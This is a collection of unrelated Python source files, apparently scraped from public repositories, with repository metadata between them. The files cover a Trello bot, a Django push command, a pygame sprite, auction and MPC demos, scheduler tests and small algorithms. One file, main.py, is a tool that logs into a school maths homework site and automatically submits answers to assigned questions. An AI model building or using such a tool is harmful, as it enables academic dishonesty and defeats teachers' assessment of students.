elif 'EVERYONE@' == principal:
return "EVERYONE", '', flags
else:
raise NotImplementedError("Cannot translate %s" % principal)
def get_nfs4_domain():
domain = subprocess.run(['egrep', '-s', '^Domain', '/etc/idmapd.conf'], stdout=subprocess.PIPE).stdout.decode('utf-8').rstrip()
try:
domain = re.search('[a-z\\.\\-]+$', domain).group(0)
except AttributeError:
pass
if len(domain) == 0:
domain = subprocess.run(['dnsdomainname'], stdout=subprocess.PIPE).stdout.decode('utf-8').rstrip()
return (domain)
def nonblank_lines(f):
for line in f:
line = line.rstrip()
if line:
yield line
def find_sub_list(sublist, mainlist):
sublist_length = len(sublist)
for index in (i for i, e in enumerate(mainlist) if e == sublist[0]):
if mainlist[index:index + sublist_length] == sublist:
return index, index+sublist_length-1
return None, None
| 7,560 |
core/action.py
|
pistonsky/trello-standup-bot
| 0 |
2170296
|
import datetime
import pytz
class Action:
def __init__(self, action, timezone):
self.action = action
self.timezone = timezone
def __str__(self):
if self.action['type'] == 'addMemberToCard':
return('{id} added to {name} at {time}'.format(
id=self.action['data']['card']['id'],
name=self.action['data']['card']['name'],
time=pytz.timezone('utc').localize(datetime.datetime.strptime(self.action['date'][:19], '%Y-%m-%dT%H:%M:%S')).astimezone(pytz.timezone(self.timezone)).strftime('%A %-I:%M %p')))
if self.action['type'] == 'removeMemberFromCard':
return('{id} removed from {name} at {time}'.format(
id=self.action['data']['card']['id'],
name=self.action['data']['card']['name'],
time=pytz.timezone('utc').localize(datetime.datetime.strptime(self.action['date'][:19], '%Y-%m-%dT%H:%M:%S')).astimezone(pytz.timezone(self.timezone)).strftime('%A %-I:%M %p')))
def __sub__(self, other):
action_a = self.action
action_b = other
duration = datetime.datetime.strptime(action_a['date'][:19], '%Y-%m-%dT%H:%M:%S') - datetime.datetime.strptime(action_b['date'][:19], '%Y-%m-%dT%H:%M:%S')
raw_seconds = duration.seconds + duration.days*24*3600
if raw_seconds < 0:
raw_seconds *= -1
return raw_seconds
def match(self, another_action):
return another_action['type'] != self.action['type'] and another_action['data']['card']['id'] == self.action['data']['card']['id']
| 1,594 |
push/management/commands/startbatches.py
|
nnsnodnb/djabaas
| 3 |
2170703
|
# coding=utf-8
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from push.models import DeviceTokenModel, NotificationModel
from datetime import datetime
import os, os.path, sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + '../../modules/')
import push_notification
class Command(BaseCommand):
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
def handle(self, *args, **kwargs):
now = '{0:%Y/%m/%d %H:%M}'.format(datetime.now())
notifications = NotificationModel.objects.filter(execute_datetime = now,
is_sent = False,
status = 0)
for notification in notifications:
device_tokens = DeviceTokenModel.objects.filter(os_version__gte = notification.os_version,
username = notification.username)
self.prepare_push_notification(notification, device_tokens)
def prepare_push_notification(self, notification, device_tokens):
device_token_lists = []
for item in device_tokens:
device_token_lists.append(item.device_token)
push_notification.execute(device_token_lists, notification)
| 1,358 |
challenges/k_difference_advanced.py
|
gioiab/py-collection
| 0 |
2170499
|
"""
Created on 06/apr/2015
@author: gioia
The script provides my solution to an advanced version of the "K difference" challenge. The challenge is about counting
the total pairs of numbers whose difference is K in a list of N non-unique positive integers.
Input:
* the first line contains N (the number of positive integers) and K (the difference)
* the second line contains the N integers
Output:
* the number of pairs whose difference is K
Enjoy!
"""
def get_pairs(l, k):
"""
Given a list L of N positive integers, returns the count of the total pairs of numbers whose difference is K.
First, each integer is stored into a dictionary along with its frequency. Then, for each integer I in the input
list, the presence of the integer I+K is checked within the dictionary. The computational time complexity of the
algorithm is still O(N).
:param k: the given difference
:type k: int
:param l: the list of input integers
:type l: list
:return: the count of the total pairs of numbers whose difference is k
:rtype: int
"""
hash_map = {}
for i in l:
hash_map[i] = hash_map.get(i, 0) + 1
return sum([hash_map[i + k] for i in l if hash_map.get(i + k)])
def main():
"""
The main function of the program. It collects the inputs and calls the get_pairs function.
"""
_, k = map(int, raw_input().split())
l = map(int, raw_input().split())
print get_pairs(l, k)
if __name__ == '__main__':
"""The entry point of the program. It simply calls the main function.
"""
main()
| 1,575 |
asteroid.py
|
borgaster/SpaceWarsEvolved
| 0 |
2169591
|
import math
import random
from loader import *
import pygame
from pygame.locals import *
class Asteroid(pygame.sprite.Sprite):
def __init__(self,num):
pygame.sprite.Sprite.__init__(self)
#Para garantir o maximo de aleatoriedade possivel
listagem=[1,2,3,4,5,6,7,8,9,10]
random.shuffle(listagem)
random.shuffle(listagem)
i=random.uniform(0,9)
if listagem[int(i)] >= 3 and listagem[int(i)] <= 5:
if listagem[int(i)] == 3:
picture="asteroid_pekeno1.png"
elif listagem[int(i)] == 4:
picture="asteroid_pekeno2.png"
else:
picture="asteroid_pekeno3.png"
self.hitpoints = 10
elif listagem[int(i)] < 3:
if listagem[int(i)] >=1 and listagem[int(i)]<=2:
picture="crazyAlien.gif"
self.hitpoints = 20
else:
picture="spaceGosma.png"
self.hitpoints=15
else:
listagem=[2,1]
random.shuffle(listagem)
if listagem[0]==1:
picture="crazyDoc.png"
self.hitpoints = 5
else:
picture="crazyship1.gif"
self.hitpoints = 11
self.image, self.rect = load_image(picture, -1)
self.Sprite = pygame.sprite.RenderPlain(())
self.num = num
self.screensize = [1120,840]
modifier = random.randrange(0,2)
if modifier == 0:
modifier = -1
else:
modifier = 1
multiplicador1 = (random.randrange(0,4)+1)*modifier
modifier = random.randrange(0,2)
if modifier == 0:
modifier = -1
else:
modifier = 1
multiplicador2 = (random.randrange(0,4)+1)*modifier
self.vel = [multiplicador1, multiplicador2]
#self.pos = [random.randrange(0,960)+40,random.randrange(0,660)+40]
self.pos = [self.screensize[0]/2,-100]
self.rect.center = self.pos
def update(self):
self.rect.move_ip(self.vel[0], self.vel[1])
# print "my coords: "+str(self.rect.center)
self.pos[0] +=self.vel[0]
self.pos[1] +=self.vel[1]
if not -110 < self.pos[0] < self.screensize[0]:
self.vel[0] = -self.vel[0]
if not -110 < self.pos[1] < self.screensize[1]:
self.vel[1] = -self.vel[1]
def kill_asteroid(self):
if self.hitpoints <=0:
self.kill()
return 1
return 0
| 2,627 |
stock/trade_reduction_demo_difference_gft0.py
|
dvirg/auctions
| 1 |
2170664
|
#!python3
"""
Demonstration of a trade-reduction strongly-budget-balanced auction
for a multi-lateral market with buyers, mediators and sellers (recipe: 1,1,1)
Since: 2020-10
Author: <NAME>
"""
from markets import Market
from agents import AgentCategory
import trade_reduction_protocol
from trade_reduction_protocol import budget_balanced_trade_reduction
import random
import logging
trade_reduction_protocol.logger.setLevel(logging.INFO)
def removeSeconds(prices, reduce_number):
new_array = []
for i in range(len(prices)):
if i % reduce_number != 0:
new_array.append(prices[i])
return new_array
print("\n\n###### RUNNING EXAMPLE FROM THE PAPER FOR TYPE (1,2,3,4): buyers-sellers-mediators")
recipe = [1, 2, 3, 4]
with_count = 1
without_count = 1
with_gft = 1
without_gft = 1
reduce_number = 1
while without_count == with_count:
reduce_number += 1
buyers = [135.9, 136.7999, 143.5499, 144.0]
sellers = [-18.95, -18.9, -17.95, -17.9, -17.7999, -17.7999, -17.2999, -17.0, -16.95, -16.7999, -15.15, -15.0, -15.0, -14.9, -14.2, -14.2, -14.1, -13.95]
mediators = [-19.7, -19.6, -19.2999, -19.2999, -19.2999, -19.2, -18.9, -18.5, -18.5, -18.5, -18.0, -17.95, -17.9, -17.7999, -17.4, -17.4, -17.35, -17.35, -15.7, -15.7, -15.6, -15.1, -14.95, -14.85, -14.75, -14.65, -14.55, -14.55, -14.5, -13.95, -13.2, -13.2, -13.2, -12.75]
mediatorsB = [-20.1, -20.0499, -19.6, -19.6, -19.5499, -19.5499, -19.45, -19.45, -19.4, -19.4, -19.1, -19.0, -19.0, -18.95, -18.7, -18.7, -18.45, -18.45, -17.9, -17.9, -17.85, -17.7, -17.45, -17.45, -17.2999, -17.2, -17.1, -17.1, -17.0499, -15.7, -15.25, -15.25, -15.25, -15.15, -14.95, -14.95, -14.95, -14.6, -14.55, -14.45, -14.45, -14.4, -14.15, -14.05, -13.75, -13.7, -13.15, -12.9, -12.9, -12.65]
#
# buyers = removeSeconds(buyers, reduce_number)
# sellers = removeSeconds(sellers, reduce_number)
# mediators = removeSeconds(mediators, reduce_number)
# mediatorsB = removeSeconds(mediatorsB, reduce_number)
#
# random.shuffle(buyers)
# random.shuffle(sellers)
# random.shuffle(mediators)
# random.shuffle(mediatorsB)
market = Market([
AgentCategory("buyer", buyers),
AgentCategory("seller", sellers),
AgentCategory("mediator", mediators),
AgentCategory("mediatorB", mediatorsB),
])
without_gft0 = budget_balanced_trade_reduction(market, recipe, False)
with_gft0 = budget_balanced_trade_reduction(market, recipe, True)
print(without_gft0)
print(with_gft0)
without_count = without_gft0.num_of_deals()
with_count = with_gft0.num_of_deals()
without_gft = without_gft0.gain_from_trade()
with_gft = with_gft0.gain_from_trade()
print('Compare: Without:', without_gft, "With:", with_gft)
print('Compare: Without:', without_count, "With:", with_count)
break
# print(" buyers =", buyers)
# print(" sellers =", sellers)
# print(" mediators =", mediators)
# print(" mediatorsB =", mediatorsB)
#
# print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: buyers-mediators-sellers")
# market = Market([
# AgentCategory("buyer", buyers),
# AgentCategory("mediator", mediators),
# AgentCategory("seller", sellers),
# ])
# print(budget_balanced_trade_reduction(market, recipe))
#
#
# print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: sellers-buyers-mediators")
# market = Market([
# AgentCategory("seller", sellers),
# AgentCategory("buyer", buyers),
# AgentCategory("mediator", mediators),
# ])
# print(budget_balanced_trade_reduction(market, recipe))
#
#
#
# print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: sellers-mediators-buyers")
# market = Market([
# AgentCategory("seller", sellers),
# AgentCategory("mediator", mediators),
# AgentCategory("buyer", buyers),
# ])
# print(budget_balanced_trade_reduction(market, recipe))
#
#
# print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: mediators-sellers-buyers")
# market = Market([
# AgentCategory("mediator", mediators),
# AgentCategory("seller", sellers),
# AgentCategory("buyer", buyers),
# ])
# print(budget_balanced_trade_reduction(market, recipe))
#
#
# print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: mediators-buyers-sellers")
# market = Market([
# AgentCategory("mediator", mediators),
# AgentCategory("buyer", buyers),
# AgentCategory("seller", sellers),
# ])
# print(budget_balanced_trade_reduction(market, recipe))
#
#
#
#
| 4,489 |
sandbox/lib/jumpscale/JumpscaleLibsExtra/servers/grid_capacity/server/app.py
|
threefoldtech/threebot_prebuilt
| 2 |
2170611
|
import os
import sys
import datetime
from flask import Flask, jsonify
from Jumpscale import j
from . import settings
from .flask_itsyouonline import configure
from .models import db
app = Flask(__name__)
app.secret_key = os.urandom(24)
configure(
app,
settings.IYO_CLIENTID,
settings.IYO_SECRET,
settings.IYO_CALLBACK,
"/callback",
None,
True,
True,
"organization",
)
# connect to mongodb
j.clients.mongoengine.get("capacity", interactive=False)
db.init_app(app)
from .api_api import api_api
from .frontend_blueprint import frontend_bp
app.register_blueprint(api_api)
app.register_blueprint(frontend_bp)
@app.template_filter()
def uptime(seconds):
if not seconds:
return "not available"
delta = datetime.timedelta(seconds=seconds)
# manually compute hh:mm:ss
hrs = int(delta.seconds / 3600)
min = int((delta.seconds - (hrs * 3600)) / 60)
sec = delta.seconds % 60
if delta.days > 0:
return "%d days, %02d:%02d:%02d" % (delta.days, hrs, min, sec)
return "%02d:%02d:%02d" % (hrs, min, sec)
@app.template_filter()
def deltatime_color(time):
"""
return a color base on the delta time between now and time
:param time: time we when to compare
:type time: datetime.datetime
:return: color
:rtype: str
"""
if not time:
return "danger"
delta = (datetime.datetime.now() - time).total_seconds()
if delta <= 600: # 10 minutes or less
return "success"
if 600 < delta and delta < 900: # between 10 and 15 minutes
return "warning"
if delta > 900: # plus de 15 minutes
return "danger"
@app.template_filter()
def node_status(time):
"""
return a color base on the delta time between now and time
:param time: time we when to compare
:type time: datetime.datetime
:return: color
:rtype: str
"""
if not time:
return "down"
delta = (datetime.datetime.now() - time).total_seconds()
if delta <= 600: # 10 minutes or less
return "up"
if 600 < delta and delta < 900: # between 10 and 15 minutes
return "likely down"
if delta > 900: # plus de 15 minutes
return "down"
@app.errorhandler(500)
def internal_error(err):
_, _, exc_traceback = sys.exc_info()
eco = j.core.errorhandler.parsePythonExceptionObject(err, tb=exc_traceback)
return jsonify(code=500, message=eco.errormessage, stack_trace=eco.traceback), 500
if __name__ == "__main__":
app.run(debug=True, port=settings.PORT, host=settings.PORT)
| 2,564 |
assignment3.py
|
racarla96/mpc-course-assignments
| 0 |
2170447
|
import numpy as np
from sim.sim2d import sim_run
# Simulator options.
options = {}
options['FIG_SIZE'] = [8,8]
options['OBSTACLES'] = True
class ModelPredictiveControl:
def __init__(self):
self.horizon = 15
self.dt = 0.2
# Reference or set point the controller will achieve.
self.reference1 = [10, 0, 0]
self.reference2 = None
self.x_obs = 5
self.y_obs = 0.1
def plant_model(self,prev_state, dt, pedal, steering):
x_t = prev_state[0]
y_t = prev_state[1]
psi_t = prev_state[2]
v_t = prev_state[3]
a_t = pedal
x_t = x_t + np.cos(psi_t) * v_t * dt
y_t = y_t + np.sin(psi_t) * v_t * dt
v_t = v_t + a_t * dt - v_t/25
psi_t = psi_t + v_t * (np.tan(steering)/2.5) * dt
return [x_t, y_t, psi_t, v_t]
def cost_function(self,u, *args):
state = args[0]
ref = args[1]
cost = 0.0
car_width = 1.0
car_height = 2.5
car_radius = 2.5
object_radius = 0.5
for i in range(0, self.horizon):
state = self.plant_model(state, self.dt, u[i*2], u[i*2+1])
# Distance cost
distance_cost = np.sqrt( ((ref[0] - state[0]) ** 2) + ((ref[1] - state[1]) ** 2) )
# Angle cost
angle_cost = 0
if distance_cost < 4:
angle_cost = (ref[2] - state[2]) ** 2
# Object cost
obj_distance = (np.sqrt(((self.x_obs - state[0]) ** 2) + ((self.y_obs - state[1]) ** 2)))
obj_cost = 0
if obj_distance < 1.5:
obj_cost = 1000/obj_distance
cost += distance_cost + obj_cost + angle_cost
return cost
sim_run(options, ModelPredictiveControl)
| 1,784 |
treillage/__init__.py
|
hanztura/Treillage
| 1 |
2169718
|
from ._version import get_versions
from .treillage import Treillage
from .treillage import BaseURL
from .exceptions import *
from .credential import Credential
from .ratelimiter import RateLimiter
from .token_manager import TokenManager
from .connection_manager import ConnectionManager
from .connection_manager import retry_on_rate_limit
__version__ = get_versions()['version']
del get_versions
| 397 |
tests/test_lr_schedulers.py
|
igormq/speech2text
| 11 |
2170802
|
import pytest
from asr import lr_schedulers
import torch
import logging
@pytest.mark.parametrize(
'name, klass',
[("step", torch.optim.lr_scheduler.StepLR),
("multi_step", torch.optim.lr_scheduler.MultiStepLR),
("exponential", torch.optim.lr_scheduler.ExponentialLR),
("reduce_on_plateau", torch.optim.lr_scheduler.ReduceLROnPlateau),
("cosine", torch.optim.lr_scheduler.CosineAnnealingLR),
("cyclic", torch.optim.lr_scheduler.CyclicLR)])
def test_by_name(name, klass):
k = lr_schedulers.by_name(name)
assert k == klass
def test_by_name():
with pytest.raises(ValueError):
lr_schedulers.by_name('invalid-name')
def test_from_params():
params = [torch.rand(1).requires_grad_()]
optimizer = torch.optim.SGD(params, 0.1)
params = 'step'
with pytest.raises(TypeError) as excinfo:
lr_scheduler = lr_schedulers.from_params(params)
isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR)
assert "missing 1 required positional argument: 'optimizer'" in str(
excinfo.value)
with pytest.raises(TypeError) as excinfo:
lr_scheduler = lr_schedulers.from_params(params, optimizer)
assert "missing 1 required positional argument: 'step_size'" in str(
excinfo.value)
lr_scheduler = lr_schedulers.from_params(params, optimizer, step_size=1)
isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR)
params = {'type': 'step'}
lr_scheduler = lr_schedulers.from_params(params, optimizer, step_size=1)
assert isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR)
params = {'type': 'step', 'step_size': 1}
lr_scheduler = lr_schedulers.from_params(params, optimizer)
assert isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR)
assert lr_scheduler.step_size == 1
params = {'type': 'step', 'step_size': 1}
lr_scheduler = lr_schedulers.from_params(params, optimizer, step_size=2)
assert isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR)
assert lr_scheduler.step_size == 2
def test_logging(caplog):
params = {'type': 'step', 'step_size': 1}
optimizer = torch.optim.SGD([torch.rand(1).requires_grad_()], 0.1)
lr_scheduler = lr_schedulers.from_params(params, optimizer, step_size=2)
assert "Instantiating class `torch.optim.lr_scheduler.StepLR` with params {'step_size': 2}" in caplog.record_tuples[
0][2]
assert logging.INFO == caplog.record_tuples[0][1]
| 2,464 |
Sources/HTTPGetImage.py
|
hatjs880328s/AutoBuildIOSProject
| 2 |
2170424
|
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
import urllib2
import time
import json
import os
from IILog import *
'''
First get All pic's url
Second download all of them
Third save in directly folder
#reference::::
<download pics>https://blog.csdn.net/j_c_weaton/article/details/53895149
<read api >https://blog.csdn.net/sunshinelyc/article/details/52755044
'''
IILog().successPrint('####### Start - HTTPGetImageModule---')
# get net work pic url
def loadALLPicsURL(url):
picDic = {}
# YSJ PIC
picDefaulturl = 'http://i2.bvimg.com/642337/51d104edb0802d52.png'
# CLOUD PIC
picLandurl = 'http://i2.bvimg.com/642337/cd1c6c175210b5aa.png'
response = urllib2.urlopen(url)
jsondata = json.loads(response.read())
for eachItem in jsondata['result']:
picDic[eachItem['id']] = picDefaulturl
return picDic
# the api url is to get Some pics
def getAPIUrl():
apiUrl = ''
fileHandle = open('sourcePathsourceipaName.txt', 'r')
for eachItem in fileHandle.readlines():
if eachItem.__contains__('ApiRefurls'):
apiUrl = eachItem[13:].strip('\n')
break
else:
continue
print('### The pics url is: ' + apiUrl)
fileHandle.close()
return apiUrl
# local pic path
def getLocalPicPath():
logoPath = ''
fileHandle = open('sourcePathsourceipaName.txt', 'r')
for eachItem in fileHandle.readlines():
if eachItem.__contains__('LogoRepath'):
logoPath = eachItem[13:].strip('\n')
break
else:
continue
fileHandle.close()
print('### The Local logo path is: ' + logoPath)
return logoPath + '/'
'''
GET URL THAT IT CAN GET PICS - apiUrl
GET ALL PICS URL LIST<STRING> - picUrls
'''
# pic api address
apiUrl = getAPIUrl()
# pic url dic <string,string>
picUrls = loadALLPicsURL(apiUrl)
# local logo path
localLogopath = getLocalPicPath()
IILog().successPrint('### Get all pic url & names ok...\n')
'''
GET PIC DATA WITH PICURL
GO-
'''
# get net pic & write to directly file
def getImageData(picName,picUrl):
binary_data = urllib2.urlopen(picUrl).read()
temp_file = open(picName, 'wb')
temp_file.write(binary_data)
temp_file.close()
# loop in - get all local logo path & use getImageData() function change it's data
def runloopChangePic():
# for picValue in picDir.keys():
path = localLogopath
for file in os.listdir(path):
if file.__contains__('.png'):
print('### Change pic ' + file + ' data start...')
getImageData(path + file, picUrls.values()[0])
IILog().successPrint('### Change pic ' + file + ' data end...\n')
'''
START-CHANGE LOGO DATA
'''
runloopChangePic()
IILog().successPrint('### Pics Change ok.')
| 2,805 |
prog_python/tuplas/swap.py
|
TCGamer123/python
| 1 |
2167776
|
x = 10;
y = 20;
#Swap tradicional
print("x e y antes do swap: ", x, y);
temp = x;
x = y;
y = temp;
print("x e y depois do swap: ", x, y);
print();
x = 10;
y = 20;
# Swap com tuplas
print("x e y antes do swap: ", x,y);
x, y = y,x;
print("x e y depois do swap: ", x,y);
| 275 |
Ago-Dic-2019/IvanMedina/pythonCrash/summingAMillon.py
|
Arbupa/DAS_Sistemas
| 41 |
2169947
|
'''
<NAME>
4.5
'''
from countingToTwenty import makeList
from countingToTwenty import printList
if __name__ == "__main__":
list=makeList(1000000)
print("[ MIN ] : {}".format(min(list)))
print("[ MAX ] : {}".format(max(list)))
print("[ SUM ] : {}".format(sum(list)))
| 285 |
main.py
|
AsadKhan163631/DFM-Answer-Tool
| 2 |
2168815
|
import json
import tkinter.messagebox as tm
import traceback
from tkinter import *
from requests import Session
from answer_handler import AnswerHandler
class InvalidLoginDetails(Exception):
pass
class LoginFrame(Frame):
def __init__(self, master):
super().__init__(master)
self.label_username = Label(self, text="Email")
self.label_password = Label(self, text="Password")
self.entry_username = Entry(self)
self.entry_password = Entry(self, show="*")
self.label_username.grid(row=0, sticky=E)
self.label_password.grid(row=1, sticky=E)
self.entry_username.grid(row=0, column=1)
self.entry_password.grid(row=1, column=1)
self.log_btn = Button(self, text="Login", command=self._login_btn_clicked)
self.log_btn.grid(columnspan=2)
self.pack()
def _login_btn_clicked(self):
email = self.entry_username.get()
password = self.entry_password.get()
if '@' not in email:
email += '@kedst.ac.uk'
try:
Interface(email, password)
except InvalidLoginDetails as e:
print(e, file=sys.stderr)
tm.showerror("Login error", "Incorrect Email or Password")
class Interface:
"""
main interface between user and script
"""
def __init__(self, email, password):
self.session = Session()
self.test_login(email, password)
self.handler = AnswerHandler(self.session)
root.destroy() # destroy login menu
self.print_init()
self.print_instructions()
self.main_loop()
def main_loop(self):
"""
main interface loop
will only exit if ctl-c is pressed
"""
print('Press ctrl-c to quit')
while True:
url = input('\nType Question url: ')
handler = AnswerHandler(self.session)
res, err = handler.answer_questions(url)
if res:
print('No more questions for this URL')
else:
print(f'Unexpected exception occurred: {err}', file=sys.stderr)
traceback.print_exc()
def test_login(self, email, password):
login_url = 'https://www.drfrostmaths.com/process-login.php?url='
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)'
' Chrome/71.0.3578.98 Safari/537.36'}
data = {'login-email': email, 'login-password': password}
self.session.post(login_url, headers=headers, data=data)
try:
"""
verifying user is authenticated by tests if user can load the times tables
"""
res = self.session.get('https://www.drfrostmaths.com/homework/process-starttimestables.php')
json.loads(res.text)
except BaseException:
raise InvalidLoginDetails(f'Email: {email}, Password: {"*" * len(password)}')
@staticmethod
def print_init():
print_string = '---- Dr Frost Answer Tool v3 ----\n' \
'---- Author: AK163631 ----\n' \
'*** Warning: this script has not been properly tested so might unexpectedly break ***\n' \
'Source: https://github.com/AK163631/DFM-Answer-Tool\n' \
'The author does not assume any liability for the use or abuse of this program!\n' \
'This tool is intended to be used to check answers\n' \
'Although it submit most answer types for you\n' \
'Release notes:\n' \
' - Fixed and optimised parser'
print(print_string)
@staticmethod
def print_instructions():
print_string = "\nstep1 - Login to dfm on both the tool and web browser\n" \
"step2 - Navigate to a set of assessment questions on dfm usually set by a teacher\n" \
"Note: you can also use the tool for practice questions aswell\n" \
"step3 - When you start the questions you will be given a URL that look something like this:\n" \
"http://www.drfrostmaths.com/homework/do-question.php?aaid=590397\n" \
"OR like this:\n" \
"http://www.drfrostmaths.com/homework/do-question.php?aaid=590399&qnum=4\n" \
"Note: It does not make a difference if you are in the middle of a set questions or at the " \
"start, the program will answer remaining questions\n" \
"step5 - Copy the URL and paste it into the tool then press enter," \
"step6 - The tool will find the answer all remaining questions\n" \
"Note: If completing practice questions the tool will submit answers indefinitely\n" \
"Note: Rarely the tool may come across an unknown answer type which it is unable to handle." \
"The tool will print this answer to the screen and you will need to input it manually"
choice = input('Do you wish to read the guide on how to use the tool? (y/n): ')
if choice == 'y':
print(print_string)
if __name__ == "__main__":
root = Tk()
root.protocol('WM_DELETE_WINDOW', sys.exit)
root.geometry('300x80')
root.title('DFM Login Screen')
lf = LoginFrame(root)
# wait for login to be retrieved
root.mainloop()
| 5,541 |
examples/Python/shapedetail.py
|
var414n/ubigraph_server
| 4 |
2170857
|
import xmlrpclib
# Create an object to represent our server.
server_url = 'http://127.0.0.1:20738/RPC2';
server = xmlrpclib.Server(server_url);
G = server.ubigraph
G.clear()
x = G.new_vertex()
y = G.new_vertex()
z = G.new_vertex()
G.new_edge(x,y)
G.new_edge(y,z)
G.set_vertex_attribute(x, "shape", "sphere");
G.set_vertex_attribute(x, "shapedetail", "40");
G.set_vertex_attribute(x, "label", "shapedetail=40");
G.set_vertex_attribute(y, "shape", "sphere");
G.set_vertex_attribute(y, "shapedetail", "10");
G.set_vertex_attribute(y, "label", "shapedetail=10");
G.set_vertex_attribute(z, "shape", "sphere");
G.set_vertex_attribute(z, "shapedetail", "5");
G.set_vertex_attribute(z, "label", "shapedetail=5");
| 709 |
Projects/Online Workouts/w3resource/String/program-75.py
|
ivenpoker/Python-Projects
| 1 |
2170757
|
#!/usr/bin/env python 3
############################################################################################
# #
# Program purpose: Find the smallest window that contains all characters of a given #
# string. #
# Program Author : <NAME> <<EMAIL>> #
# Creation Date : November 5, 2019 #
# #
############################################################################################
from collections import defaultdict
def obtain_user_data(input_mess: str) -> str:
is_valid, user_data = False, ''
while is_valid is False:
try:
user_data = input(input_mess)
if len(user_data) == 0:
raise ValueError('Oops! Data needed')
is_valid = True
except ValueError as ve:
print(f'[ERROR]: {ve}')
return user_data
def find_sub_string(some_str: str) -> str:
str_len = len(some_str)
# Count all distinct characters
dist_count_char = len(set([x for x in some_str]))
ctr, start_pos, start_pos_index, min_len = 0, 0, -1, 9999999999
curr_count = defaultdict(lambda: 0)
for i in range(str_len):
curr_count[some_str[i]] += 1
if curr_count[some_str[i]] == 1:
ctr += 1
if ctr == dist_count_char:
while curr_count[some_str[start_pos]] > 1:
if curr_count[some_str[start_pos]] > 1:
curr_count[some_str[start_pos]] -= 1
start_pos += 1
len_window = i - start_pos + 1
if min_len > len_window:
min_len = len_window
start_pos_index = start_pos
return some_str[start_pos_index: start_pos_index + min_len]
if __name__ == "__main__":
main_data = obtain_user_data(input_mess='Enter some string data: ')
print(f'Smallest window that contains all characters of the said string: {find_sub_string(some_str=main_data)}')
| 2,239 |
scripts/split-dataset.py
|
vr100/rl-trading
| 0 |
2170544
|
import argparse, os
from utils import dataset
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"--data_path", type=str, help="specifies the train csv data file path",
required=True)
parser.add_argument(
"--output_path", type=str, help="specifies the output folder path",
required=True)
parser.add_argument(
"--time_sensitive", default=False,
type=lambda s: s.lower() in ['true', 'yes', '1'],
help="specifies whether the test data should be after train data")
return vars(parser.parse_args())
def main():
args = parse_args()
print("Args: {}".format(args))
data_path = os.path.abspath(args["data_path"])
output_path = os.path.abspath(args["output_path"])
time_sensitive = args["time_sensitive"]
dataset.split_data(data_path, output_path, time_sensitive)
main()
| 812 |
logs_pack/logs.py
|
Saldenisov/QY_itegrating_sphere
| 0 |
2169048
|
import logging
import os.path
def initialize_logger(output_dir, name=None):
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# create console handler and set level to info
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
# create error file handler and set level to error
handler = logging.FileHandler(os.path.join(
output_dir, "error.log"), "w", encoding=None, delay="true")
handler.setLevel(logging.ERROR)
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
# create debug file handler and set level to debug
handler = logging.FileHandler(os.path.join(output_dir, "all.log"), "w")
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
| 1,167 |
program.py
|
PiggyAwesome/Collatz-Conjecture
| 3 |
2170837
|
import time
import webbrowser
i = int(input("Input number: "))
typee = "bar"
resulty = []
result = i + 0
while result != 1:
if (result % 2) != 0:
result = (result * 3) + 1
else:
result = result / 2
print(int(result))
resulty.append(result)
r = []
for i in range(len(resulty)):
r.append('%20')
webbrowser.open("https://quickchart.io/chart?title=3N%2B1&c={type:" + f'"{typee}"' + ",data:{labels:" + f"{r}" +" , datasets:[{label:'3N%2B1',data:" + f"{resulty}" + "}]}}") # Also makes a nice chart.
| 535 |
Problems/6. Procedures and Functions/5.Output_hello_and_world.py
|
wilpola/Introduction-to-programming_Python3
| 0 |
2170748
|
# @author: <NAME>
# @date: 2021-10-29
# Score: 10/10 2nd try
import random
def print_hello():
print("Hello")
def print_world():
print("World")
for i in range(0,10):
if random.randint(0,1) == 0:
print_hello()
else:
print_world()
# saying that there needs to be a new line char is misleading
| 315 |
zemberek/tokenization/span.py
|
Loodos/zemberek-python
| 52 |
2170880
|
class Span:
r"""
A class that represents specified chunks of a string. It is used to divide
TurkishSentenceExtractor input paragraphs into smaller pieces from which the
features will be extracted.
"""
def __init__(self, start: int, end: int):
if start >= 0 and end >= 0:
if end < start:
raise Exception("Span end value can not be smaller than start value")
else:
self.start = start
self.end = end
else:
raise Exception("Span start and end values can not be negative")
def get_length(self) -> int:
return self.end - self.start
def middle_value(self) -> int:
# THIS METHOD IS WRONG, CHECK THE USAGE
return self.end + (self.end - self.start) // 2
def get_sub_string(self, string: str) -> str:
return string[self.start:self.end]
def in_span(self, i: int) -> bool:
return self.start <= i < self.end
def copy(self, offset: int) -> 'Span':
return Span(offset + self.start, offset + self.end)
| 1,094 |
lib/piservices/remote/base.py
|
creative-workflow/pi-setup
| 1 |
2170560
|
from StringIO import StringIO
import color
class AbstractRemoteLoader:
def __init__(self, service, remote_file = None):
self.service = service
self.remote_file = remote_file
self.content = ''
self.fd = None
def load(self, remote_file = None):
if remote_file:
self.remote_file = remote_file
try:
with self.service.api.hide('output','running'):
self.service.run('sudo mkdir -p $(dirname %(f)s) && sudo touch %(f)s' % {'f': self.remote_file})
self.content = self.service.run('sudo cat %s' % self.remote_file)
except:
pass #no problem ...file doesnt exist, we will create
self.fd = StringIO(self.content)
self.fd.seek(0)
def prepare_content_for_write(self):
pass
